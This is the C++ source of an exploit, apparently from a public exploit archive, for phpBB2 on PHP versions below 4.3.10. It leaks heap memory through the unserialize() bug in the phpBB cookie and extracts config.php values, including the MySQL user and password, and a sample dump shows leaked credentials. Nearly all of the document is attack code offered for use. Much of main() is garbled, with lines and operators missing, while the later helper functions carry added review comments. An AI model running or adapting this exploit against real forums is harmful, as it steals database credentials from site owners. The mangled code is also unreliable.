
phpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit
phpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit



php bug in ext/standard/var_unserializer.c in php < 4.3.10

for dumping php heap memory with phpbb2, which uses unserialize() for cookies, and finding config.php (sql password) in the heap.



you need http://overdose.tcpteam.org/serv.h and http://overdose.tcpteam.org/serv.cpp to compile





/*

	*** coded by overdose ***

slythers@gmail.com 

	php bug in ext/standard/var_unserializer.c http://www.securityfocus.com/archive/1/384663/2004-12-13/2004-12-19 /0

	for reading heap memory with phpbb2 ;>

tested : phpbbmemorydump.exe "http://site.com/phpbb/" 30000 -cookiename=phpbb2support > a.txt

	result:

		- string detected : /home/virtual/site.com/phpBB/config.php

		- string detected : dbname

		- string detected : PT_N

		- string detected : phpbb

		- string detected : dbuser

		- string detected : phpbb  << mysql user

		- string detected : dbpasswd

		- string detected : phpBB_R0cKs << mysql password

		- string detected : table_prefix

		- string detected : phpbb_

	use like :

		phpbbmemorydump.exe "http://site.com/phpbb2/" nboctettoreadinheap [repeat/display_all_heap] [-cookiename=phpbb2mysql]

	greetz:

	my crew MWA

	pull the plug , vortex challenge

www.security-challenge.com 

http://overdose.tcpteam.org/ 

	slipknot , dr dre , ...

	all #s-c and all i forget

	compile with borland c++ (freecommandlinetools) :

		bcc32 -c serv.cpp

		bcc32 bbmemorydump.cpp serv.obj

*/



#include 

#include 

#include "serv.h"



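/* TCP port used for the request. Presumably the default when the URL gives
 * none; parseurl() and main() are not legible in this copy of the file. */
#define HTTP_PORT 80

/* Alias for the global buffer below that holds the cookie signature to scan for. */
#define SIGNATURE_REQUEST signaturequete

/* Start of the response header line the scan looks for. */
#define SIGNATURE_REQUEST_START "\nSet-Cookie: "

/* Cookie name used when no -cookiename= argument is given. */
#define DEFAULT_COOKIE_NAME "phpbb2mysql"

/* Suffix that is presumably appended to the cookie name to form the full key
 * ("<name>_data="); its use is in main(), which is not legible here. */
#define END_SIGNATURE "_data="

/* Minimum run of accepted bytes before a heap fragment is reported as a
 * "string detected". */
#define MIN_NB_LETTRE 3

/* Wait time in milliseconds (5 seconds). Parenthesized so the macro acts as a
 * single value in any expression: the original `1000*5` made
 * `x / NB_SEC_FOR_WAIT` expand to `x / 1000 * 5`. */
#define NB_SEC_FOR_WAIT (1000*5)

/* Cookie signature assembled at run time from the cookie name.
 * NOTE(review): fixed size; whatever fills it must bound the copy to 512 bytes —
 * the filling code is not legible in this copy. */
char signaturequete[512];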



/* Target URL as split by parseurl() (definition not legible in this copy). */
struct url{

	char *dns;            /* host name part of the URL */

	char *uri;            /* path part, sent in the request line */

	unsigned short port;  /* TCP port; presumably HTTP_PORT when the URL gives none */

};



/* Split a URL string into host, path and port. Definition not legible here. */
struct url parseurl(char *of);

/* Convert a non-negative int to a newly allocated (new[]) decimal string; the
 * legible tail of the definition returns 0 for negative input. Caller owns
 * the result. */
char * intostr(int erf);

/* True when carac is one of the bytes in a fixed table of printable bytes. */
bool goodcar(char carac);

/* Decode "%XX" escapes in place and return the new length. The name is
 * historical: no UTF-8 decoding takes place. */
unsigned int utf8decode(char *utf);

/* Parse the two hex digits at of[0] and of[1]. *wesh is set to 1 when both
 * are valid hex digits, 0 otherwise (the return value is then 0x00). */
char alphanum(char *of,bool *wesh);



int main(int argc,char **argv)

{

	struct url urlparsed;

	serveur http;

	unsigned int nbmemread;

	char car;

	bool repeat = 0;

	bool displayheap = 0;

	char *cookname = DEFAULT_COOKIE_NAME;

	WSAData wsadata;

	if (WSAStartup(MAKEWORD(2, 0),&wsadata) != 0)

		return 1;

	cout <<"coded by overdose / bad boyz coding"<\"http://site.com/phpbb2/\" nboctettoreadinheap [repeat/display_all_heap] [-cookiename=phpbb2mysql]"<= (nbmemread*3)))

					{

						exit = 1;

						continue;

					};

					word[cptstr] = car;

					cptstr++;

					word[cptstr] ='\0';

				};

				if(displayheap)

					cout << word< MIN_NB_LETTRE )

					{

						wtmp = new char[(cpt - compteur)+1];

						strncpy(wtmp,&word[compteur],cpt - compteur);

						wtmp[cpt - compteur] = '\0';

						cout <<"- string detected : " <= 0)

	{

		puissance =0;

		for(int kekette = 1;kekette<=erf;kekette = kekette*10)

		{

			puissance++;

		};

		if (puissance == 0)

		{

			puissance = 1;

		};

		chaine = new char[puissance+1];

		chaine[puissance] ='\0';

		for(int arf = puissance-1;arf >=0;arf--)

		{

			erf2 = erf % 10 ;

			chaine[arf] = '0' + erf2;

			erf = erf /10;

		};

		return chaine;

	}

	else

		return 0;

}



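/*
 * Return true when carac is a byte the string extractor treats as printable.
 *
 * The table is the original author's list; the digit '7' was missing from it
 * (a typo that cut off any run containing a 7) and is now present. The accented
 * letters are presumably single bytes in the original Windows code page; in a
 * UTF-8 copy of this file they are multi-byte and are only ever matched
 * byte-wise.
 */
bool goodcar(char carac)
{
	static const char accepted[] =
		"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ0123456789<>é@à)]=}è[_-{#&*\\/-+~'ç$%.:;|^~$,!?\"\'\t\r\n ";

	/* NUL is never printable, and without this check it would match the
	 * table's own terminator below. */
	if (carac == '\0')
		return false;

	for (const char *p = accepted; *p != '\0'; p++)
	{
		if (*p == carac)
			return true;
	}
	return false;
}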



/*
 * Decode "%XX" escapes in utf in place and return the decoded length (without
 * the terminator). The name is historical: this is URL percent-decoding, no
 * UTF-8 handling happens here.
 *
 * A '%' that is not followed by two hex digits (as judged by alphanum()) is
 * copied through unchanged, as are the bytes after it. A "%00" escape writes a
 * NUL byte into the buffer and decoding continues past it, so the returned
 * length may exceed strlen() of the result.
 */
unsigned int utf8decode(char *utf)
{
	unsigned int src = 0;
	unsigned int dst = 0;

	while (utf[src] != '\0')
	{
		char out = utf[src];
		if (out == '%')
		{
			bool ok;
			char decoded = alphanum(&utf[src + 1], &ok);
			if (ok)
			{
				out = decoded;
				src += 2;  /* skip the two hex digits; the '%' is skipped below */
			}
		}
		utf[dst] = out;
		dst++;
		src++;
	}
	utf[dst] = '\0';
	return dst;
}



/* Value of one ASCII hex digit (0-9, a-f, A-F), or -1 for any other byte. */
static int hexdigit_value(char c)
{
	if (c >= '0' && c <= '9')
		return c - '0';
	if (c >= 'a' && c <= 'f')
		return c - 'a' + 10;
	if (c >= 'A' && c <= 'F')
		return c - 'A' + 10;
	return -1;
}

/*
 * Parse the two hex digits at of[0] and of[1] into one byte.
 *
 * *wesh is set to 1 when both bytes are hex digits and the decoded byte is
 * returned; otherwise (short input, or a non-hex byte in either position) *wesh
 * is 0 and the result is 0x00. of[1] is only read after of[0] was found to be
 * non-NUL, so a one-byte string is handled without reading past its end.
 */
char alphanum(char *of,bool *wesh)
{
	*wesh = 0;

	if (of[0] == '\0' || of[1] == '\0')
		return 0x00;

	int hi = hexdigit_value(of[0]);
	if (hi < 0)
		return 0x00;

	int lo = hexdigit_value(of[1]);
	if (lo < 0)
		return 0x00;

	*wesh = 1;
	return (char)((unsigned char)(hi * 0x10 + lo));
}
